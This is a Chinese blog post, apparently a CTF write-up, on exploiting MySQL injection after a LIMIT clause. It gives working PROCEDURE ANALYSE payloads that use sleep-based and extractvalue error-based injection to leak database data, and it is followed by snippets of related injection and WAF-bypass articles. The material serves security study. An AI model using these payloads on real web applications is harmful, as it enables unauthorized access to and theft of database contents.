Mysql注入点在limit关键字后面的利用方法

最新推荐文章于 2024-05-27 07:59:10 发布
最新推荐文章于 2024-05-27 07:59:10 发布
阅读量771 收藏 2
点赞数 1
分类专栏: CTF-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46315342/article/details/107527889
版权

遇到一个这样贱贱的题目:
小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢?

所以就写一篇博客记录一下

先看看 mysql 5.x 的文档中的 select 的语法:
SELECT
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr [, select_expr …]
[FROM table_references
[WHERE where_condition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], … [WITH ROLLUP]]
[HAVING where_condition]
[ORDER BY {col_name | expr | position}
[ASC | DESC], …]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]
[INTO OUTFILE ‘file_name’ export_options
| INTO DUMPFILE ‘file_name’
| INTO var_name [, var_name]]
[FOR UPDATE | LOCK IN SHARE MODE]]

就是说在where之后还有那么多的语句可以写在select语句中,这里我们用到的就是Limit,limit 关键字后面还有 PROCEDURE 和 INTO 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。

直接将例子:

select * from users where id=1 LIMIT 1,1 PROCEDURE ANALYSE(1,1);

和延时注入结合

select * from users where id=1 LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

和报错注入结合

select * from users where id=1 LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

就那我遇到的那个题目来说,找到注入点之后,直接写上procedure~~~语句,里面的报错注入语句可以改为

procedure analyse(·········报错注入语句·········,1)

在这里插入图片描述
我是参考的这篇文章https://www.freebuf.com/articles/web/57528.html

小哈小哈喽
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql limit 加条件_MySQLLIMIT 条件后注入
weixin_30979383的博客
01-21 1004
from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/此方法适用于MySQL 5.x中,在limit语句后面注入例如:SELECT[ALL|DISTINCT|DISTINCTROW][HIGH_PRIORITY][STRAIGHT_JOIN][SQL_SMALL_RESULT][SQL_BIG_RESULT...
mysql+limit+sql注入_sql注入limit注入和五种时间盲注姿势
weixin_29712031的博客
01-21 409
0x00前言limit注入和时间前面也提过一了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT?*?FROM?table?LIMIT?[offset,]?rows?...
MysqlLimit注入方法(此方法仅适用于5.0.0<mysql<5.6.6的版本)
最新发布
余十步的博客
05-27 615
问题的关键在于,语句中有 order by 关键字mysql 中在 order by 前面可以使用 union 关键字,所以如果注入前面没有 order by 关键字,就可以使用 union 关键字,但是现在的情况是,注入前面有 order by 关键字。在LIMIT后面可以跟两个函数,PROCEDURE 和 INTO,INTO除非有写入shell的权限,否则是无法利用的,这里的重是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE。得到表名:article,user。
mysql注入关键字_Mysql注入limit关键字后面利用方法
weixin_35249119的博客
01-19 252
Post Views:5,294描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。细节在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT注入】问题的关键在于...
技术分享:Mysql注入limit关键字后面利用方法
Fly_鹏程万里
09-23 917
描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。 细节 在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入】 问题的关键在于,语句中有...
【转载】Mysql注入limit关键字后面利用方法
weixin_30393907的博客
07-18 176
描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。 细节 在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样: SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT注入】 问...
mysql注入关键字_(转载)MySql注入科普
weixin_35733852的博客
02-28 342
默认存在的数据库:mysql需要root权限读取information_schema在5以上的版本中存在测试是否存在注入方法假:表示查询是错误的 (MySQL 报错/返回页面与原来不同)真:表示查询是正常的 (返回页面与原来相同)共三种情况:字符串类型查询时:数字类型查询时:登陆时:'假''真"假""真\假\\真AND 1真AND 0假AND true真AND false假1-false有问题时返...
mysql注入关键字_Mysql数据库注入科普 注入技巧招式大全
weixin_34921054的博客
01-19 194
0X01 注入科普默认存在的数据库:mysql 需要root权限读取information_schema 在5以上的版本中存在测试是否存在注入方法假:表示查询是错误的 (MySQL 报错/返回页面与原来不同)真:表示查询是正常的 (返回页面与原来相同)共三种情况:例子:SELECT * FROM Users WHERE id = '1''';SELECT * FROM Users WHER...
mysql使用limit存在的漏洞_Mysql 注入limit 注入
weixin_42524703的博客
01-19 415
一般实际过程中使用 limit 时,大概有两种情况,一种使用order by,一种就是不使用 order by关键字不存在 order by 关键字执行语句select id from users limit 0,1这种情况下的 limit 后面可以使用union进行联合查询注入执行语句select id from users limit 0,1 union select username fro...
mysql 注入关键字waf_SQL注入绕过WAF方法(By Pass WAF)
weixin_28979369的博客
02-05 353
WAF是如何工作的?协议异常检测:拒绝不符合HTTP标准的请求增强的输入验证:代理和服务器端验证,而不仅仅是客户端验证白名单和黑名单基于规则和基于异常的保护:基于规则的更依赖黑名单机制,基于异常则更灵活状态管理:关注会话保护还有:Cookie保护,反入侵规避技术,响应监控和信息披露保护。SQL注入绕过WAF几种方式方法:1.当我们在目标URL进行SQL注入测试时,可以通过修改注入语句中字母的大小写...
第二节 Mysql注入有关知识-01
09-15
Mysql注入有关知识 Mysql注入是指攻击者通过构造恶意输入, Inject恶意数据到Mysql数据库中,达到未经授权的访问、控制或破坏数据库的行为。下面是Mysql注入有关知识的总结: 1. Mysql 5.x数据结构 在Mysql ...
python mysql 字段与关键字冲突的解决方式
09-08
例如,如果一个数据表中有名为`status`或`limit`这样的字段,它们在MySQL中是保留关键字,直接在SQL语句中使用可能会引发错误。为了解决这个问题,我们需要将这些字段名用反引号包裹,使得MySQL能够正确识别它们作为...
MySQL在不知道列名情况下的注入详解
12-16
本文将详细讲解如何在不知道列名的情况下进行MySQL注入。 首先,我们需要了解的是MySQL的information_schema库,这是一个系统库,包含了关于所有数据库、表、列等元数据的信息。在MySQL 5及以上版本中,这个库是...
php mysql获取表字段名称和字段信息的三种方法
12-19
在PHP与MySQL交互时,有时我们需要获取数据库表的字段名称和相关字段信息,例如字段类型、是否可为空、默认值等。以下将介绍三种方法来实现这一目标。 1. 使用`DESC`命令 `DESC`是SQL中的一个关键字,用于描述...
找到一种不错的从SQLServer转成Mysql数据库的方法
12-15
在实际操作中,当使用PDO连接SQL Server并执行查询时,需要注意SQL Server不支持MySQL中的`LIMIT`子句,需要找到相应的替代方法。例如,如果要获取前N条记录,可以使用`TOP N`关键字。 其次,当处理TEXT字段时,...
burp intruder爆破出现 Payload set 1: Invalid number settings的解决办法
热门推荐
m0_46315342的博客
07-15 1万+
如果击start attrack 后出现 Payload set 1: Invalid number settings 的提示,先hex 后 decimal 再开始start attrack,这是一个软件bug,需要手动让它刷新。 如果你是第一次打开这个这个页面,可能设置了范围之后就可以进行爆破,但是如果你要再次利用这个包进行爆破,可能就会出现第一张图的提示信息。 当你先hex 后 decimal 再开始start attrack,这时数字就会变化,就刷新了。 就先一下HEX,然后再De
Burp Suite中intruder爆破模块四种模式的区别
m0_46315342的博客
07-05 1952
1.sniper(俗称狙击手模式): ***这个的意思是只有一个字典(一组payload)进行攻击,但是攻击位置可以有多个,当有多个时,按顺序来,一个接着一个。 假设我现在的payload(爆破字典)有100条数据,当上面的爆破位置只有一个时,此时便进行100次攻击。 当此时的攻击位置有两个时,则首先爆破第一个位置,先攻击第一个位置100次,再攻击第二个位置100次。但是两个位置使用的是同一个字典。 2.Battering ram(攻城锤) 这个和上面的sniper有些类似,他们都只用了一个字典或者说.
BUUCTF WEB LOVESQL
m0_46315342的博客
08-20 1029
BUUCTF WEB LOVESQL 这个题考的是普通的联合注入,但是有一个比较坑的地方就是注释符,所以以后一定要多试试注释符。这个题是这样的,如果你直接写# 或者 --+ 这样的,就得不到想要的界面,这里需要对注释符进行url编码,换成%23这样的 设置用户名为123,密码为111登陆试一下 在用户名处设置’ “试一下 只有设置为单引号的时候有报错信息,然后试一下万能密码 ’ or 1=1# 出现了这样的情况,原因竟然是注释符要换成编码过的%23 然后就是正常的流程了(这个题目usern
mysqllimit动态传参数
08-15
回答: 在MySQL中,使用LIMIT关键字可以限制查询结果的返回数量。它可以用于返回前几条或者中间某几行数据。在查询语句中,可以使用LIMIT [offset,其中offset指定了从结果集中的第几行开始返回数据。比如,SELECT * ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值